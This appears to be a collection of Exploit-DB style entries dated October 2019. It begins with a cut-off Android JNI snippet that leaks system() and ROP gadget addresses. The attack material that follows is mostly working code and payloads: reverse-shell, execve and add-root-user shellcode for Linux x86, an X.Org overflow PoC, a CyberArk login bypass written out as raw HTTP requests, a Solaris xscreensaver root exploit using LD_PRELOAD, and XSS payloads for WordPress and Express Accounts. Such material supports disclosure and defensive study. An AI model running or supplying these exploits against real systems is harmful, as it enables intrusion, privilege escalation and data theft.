    snprintf(buff, sizeof(buff), "%p", get_system_address());
    dlclose(libc);
    std::string system_string = buff;
    return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
    char buff[30];
    get_gadget_lib_base_address();
    //gadget address
    snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
    dlclose(lib);
    std::string system_string = buff;
    return env->NewStringUTF(system_string.c_str());
}

# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624

#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes import cast
from ctypes.util import find_library

def access_violation(x11, current_display):
keyboard = (ct.c_char * 1000)()
x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

print "\n[*] Loading x11...\n"
time.sleep(2)

x11 = ct.cdll.LoadLibrary(find_library("X11"))
current_display = x11.XOpenDisplay(None)

print "[*] Exploiting...\n"
time.sleep(1)

try:
access_violation(x11, current_display)

except:
print "\nError...\n"
sys.exit(1)

# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Date: 2019-10-16
# Author:  bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start

section .text
_start:


;socket()
xor ecx, ecx        ; xoring ECX
xor ebx, ebx        ; xoring EBX
mul ebx             ; xoring EAX and EDX
inc cl              ; ECX should be 1
inc bl
inc bl              ; EBX should be 2
mov ax, 0x167       ;
int 0x80            ; call socket()

;connect()          ; move the return value of socket
xchg ebx, eax       ; from EAX to EBX ready for the next syscalls

; push sockaddr structure in the stack
dec cl
push ecx                ; unused char (0)

; move the lenght (16 bytes) of IP in EDX
mov dl, 0x16

; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
mov ecx, 0x04030382              ; mov ip in ecx
sub ecx, 0x03030303              ; subtract 3.3.3.3 from ip
push ecx                         ; load the real ip in the stack
push word 0x5c11                 ; port 4444
push word 0x02                   ; AF_INET family
lea ecx, [esp]
                                 ; EBX still contain the value of the
opened socket
mov ax, 0x16a
int 0x80

; dup2()
    xor ecx, ecx
    mov cl, 0x3

dup2:
    xor eax, eax
                                 ; EBX still contain the value of the
opened socket
    mov al, 0x3f
    dec cl
    int 0x80
    jnz dup2

; execve() from the previous polymorphic analysis 25 bytes
cdq                     ; xor edx
mul edx                 ; xor eax
lea ecx, [eax]          ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx                ; push NULL in stack
push esi                ; push hs/ in stack
push edi                ; push nib// in stack
lea ebx, [esp]          ; load stack pointer to ebx
mov al, 0xb             ; load execve in eax
int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";

void main()
{

printf("Shellcode Length:  %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

# Exploit Title: Linux/x86 - execve /bin/sh ShellCode (25 bytes)
# Date: 2019-10-14
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A

/*
global _start

section .text
_start:


cdq        ; xor edx
mul edx
lea ecx, [eax]
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx                ; push NULL in stack
push esi
push edi                ; push hs/nib// in stack
lea ebx, [esp]          ; load stack pointer to ebx
mov al, 0xb             ; load execve in eax
int 0x80                ; execute

*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";

void main()
{

printf("Shellcode Length:  %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
# Date: 2019-10-12
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# Comments: add user "User" to /etc/passwd
# CVE: N/A

/*
00000000  31DB              xor ebx,ebx
00000002  31C9              xor ecx,ecx
00000004  66B90104          mov cx,0x401
00000008  F7E3              mul ebx
0000000A  53                push ebx
0000000B  6873737764        push dword 0x64777373
00000010  68632F7061        push dword 0x61702f63
00000015  682F2F6574        push dword 0x74652f2f
0000001A  8D1C24            lea ebx,[esp]
0000001D  B005              mov al,0x5
0000001F  CD80              int 0x80
00000021  93                xchg eax,ebx
00000022  F7E2              mul edx
00000024  686E2F7368        push dword 0x68732f6e
00000029  683A2F6269        push dword 0x69622f3a
0000002E  68303A3A2F        push dword 0x2f3a3a30
00000033  683A3A303A        push dword 0x3a303a3a
00000038  6855736572        push dword 0x72657355
0000003D  8D0C24            lea ecx,[esp]
00000040  B214              mov dl,0x14
00000042  B004              mov al,0x4
00000044  CD80              int 0x80
00000046  2C13              sub al,0x13
00000048  CD80              int 0x80



*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";

void main()
{

printf("Shellcode Length:  %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
# Date: 2019-10-16
# Author: Daniel Martinez Adan (adon90)
# Vendor: https://www.cyberark.com
# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Collaborator: Luis Buendía (exoticpayloads)
# Version Affected: All

# It is possible to retrieve a valid cookie by injecting special characters
# in the username field:

vulnerable parameter:
pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername

URL:
/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx

Payload:
%1F

# Requirements:
# Using a valid ViewState -> if it doesn't work, go to the login panel to
# automatically generate a valid ViewState


# Once the valid cookie is obtained, it is posible to perform multiple
# actions in the PasswordVault such us:
# - Retrieving valid user information (Name, Email, Phone number….)
# - DoS
# - DNS enumeration via ip address
# - Possibly deleting users


# Login Bypass:

POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 2435
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=


# User Information:

POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 28
{"userName":"administrator"}


# Resolve DNS / DoS

GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CAAjax: adon90
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1

Affected software: Tomedo Server 1.7.3
Vulnerability type: Cleartext Transmission of Sensitive Information & Weak Cryptography for Passwords
Vulnerable version: Tomedo Server 1.7.3
Vulnerable component: Customer Tomedo Server that communicates with Vendor Tomedo Update Server
Vendor report confidence: Confirmed
Fixed version: Version later then 1.7.3
Vendor notification: 20/09/19
Solution date: 25/09/19
CVE reference: CVE-2019-17393
CVSS Score: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 
Credits: Chris Hein, ProSec GmbH
Communication Timeline: 
20th September 2019 Initial contact - no response
25th September second contact attempt
28th September Vendor responded and released an update
14th October fulldisclosure 

Vulnerability Details:
The Customer’s Tomedo Server in Version 1.7.3 communicates to the Vendor Tomedo Server via HTTP (in cleartext) that can be sniffed by unauthorized actors.
Basic authentication is used for the authentication what’s makes it possible to base64 decode the sniffed credentials and get hold of the username and password.

Proof of concept:
Capture the traffic between the Tomedo servers via a proxy or a MITM attack and base64 decode the credentials from the HTTP GET request.

# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support
# Tested on Windows 10
# CVE : N/A 


c:\>sc qc Mikogo-Service
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Mikogo-Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Mikogo-Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Document Title
===============
Reflected XSS via `Broken Link Checker` v.1.11.8 WordPress plugin.

Product Description
===============
Broken Link Checker will monitor your blog looking for broken links and let
you know if any are found.

Homepage: https://managewp.com/
WordPress Plugin: https://wordpress.org/plugins/broken-link-checker/

PoC
===============

1) Login to your wordpress webpage
2) Navigate to the following page (Make sure the `s_link_text` parameter
returns a valid link on your blog:

http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search&s_link_text=word&s_link_url&s_http_code&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E&s_link_type&search_button=Search+Links

3) Note the form alerts and the payload within the `s_filter` parameter
executed.


CVE-2019-17207

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as 
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
echo "int getuid(){return 0;}"> /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -

# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on Windows 10
# CVE : N/A 

c:\>sc qc romservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: romservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : LiteManagerTeam LiteManager
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-16
# Vendor Homepage: https://www.nchsoftware.com 
# Source: https://www.nchsoftware.com/accounting/index.html
# Version: Express Accounts Accounting v7.02
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Accounts Accounting v7.02
=========================================
Express Accounts is professional business accounting software, perfect for small businesses. 

# Vulnerability 
================
Persistent Cross site scripting (XSS).

# PoC 
======

1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e  http://A.B.C.D:98 [Default installation]. 
2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
Save the change. 

or 

Under "Sales Orders"
Sales Orders -> view Orders ->  Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script>
Save the change. 

or 

Under "Items"
Items -> Add new item-> Item field: put  </script><script>alert('XSS');</script>
Save the change. 

or 

Under "Customers"
Customers -> Add New Customer -> Customer Name:  put  </script><script>alert('XSS');</script>
Save the change. 

or 

Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put  </script><script>alert('XSS');</script>
Save the change. 

3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute.

# Disclosure Timeline
======================
Vulnerability Discover Date: 15-Sep-2019.
Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. 
Submit exploit-db : 16-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.